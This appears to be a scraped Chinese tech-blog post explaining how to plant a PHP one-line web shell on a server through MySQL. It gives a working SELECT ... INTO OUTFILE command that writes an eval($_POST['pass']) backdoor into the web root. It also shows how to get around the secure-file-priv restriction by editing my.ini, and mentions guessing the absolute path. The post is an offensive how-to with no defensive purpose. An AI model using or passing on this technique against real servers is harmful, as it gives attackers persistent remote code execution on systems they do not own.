• 设为首页
  • 点击收藏
  • 手机版
    手机扫一扫访问
    迪恩网络手机版
  • 关注官方公众号
    微信扫一扫关注
    迪恩网络公众号
登陆 注册
描述文字

通过mysql写入php一句话木马

原作者: [db:作者] 来自: [db:来源] 收藏 邀请

 利用mysql写入一句话木马

前提:

  root权限,知道了服务器的web的绝对路径

select "<?php @eval($_POST['pass']);?>" INTO OUTFILE "D:\\WWW\\22.php"

如果执行成功,生成D:\WWW\22.php,并写入

<?php @eval($_POST['pass']);?>

如果出现:

  提示错误[Error Code] 1290 - The MySQL server is running with the --secure-file-priv option解决办法

是mysql设置的权限的问题

mysql对通过文件导入导出作了限制,默认不允许

show variables like '%secure%';

修改my.ini

secure_auth = ON
secure_file_priv = ""

注意: 

  1、绝对路径的猜解

  2、INTO OUTFILE 后面的"D:\\WWW\\22.php"(对反斜杠做了一次转义)

 

鲜花
握手
雷人
路过
鸡蛋
该文章已有0人参与评论

请发表评论

全部评论

专题导读
More+
上一篇:
php操作成功返回当前页并刷新发布时间:2022-07-10
下一篇:
PHP获取时间日期的多种方法发布时间:2022-07-10
热门推荐
More+
热门话题
More+
阅读排行榜

扫描微信二维码

查看手机版网站

随时了解更新最新资讯

139-2527-9053

在线客服(服务时间 9:00~18:00)

在线QQ客服
地址:深圳市南山区西丽大学城创智工业园
电邮:jeky_zhao#qq.com
移动电话:139-2527-9053

Powered by 互联科技 X3.4© 2001-2213 极客世界.|Sitemap